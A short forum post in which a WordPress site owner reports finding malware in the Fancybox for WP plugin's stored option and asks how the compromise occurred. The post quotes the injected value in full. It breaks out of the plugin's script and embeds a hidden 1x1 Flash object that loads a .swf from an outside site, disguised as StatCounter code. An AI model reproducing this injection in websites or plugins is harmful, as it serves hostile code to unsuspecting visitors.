upon further investigation I've found that the suspicious code is in the options. The mfbfw option contains the malware code and injects into the Fancybox for WP header output. Anyone have any ideas how this compromise could have happened? Here is what was in the mfbfw option:
a:3:{s:10:"extraCalls";s:1:" ";s:13:"transitionOut";s:762:"",'centerOnScroll': false});})
</script>
<!-- Start of StatCounter Code for Default Guide -->
<object type="application/x-shockwave-flash" data="http://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1px" height="1px" id="cea0d16fdd2e07f5498e0c64ebd186a2">
<param name="AllowScriptAccess" value="always"/>
<param name="myid" value="cea0d16fdd2e07f5498e0c64ebd186a2" />
<param name="movie" value="http://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2"/>
<embed src="http://www.weathershieldlimited.com/images/banners/eaj.swf
?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1" height="1">
</embed>
</object>
<!-- End of StatCounter Code for Default Guide -->
<script>({";s:16:"extraCallsEnable";s:3:"off";}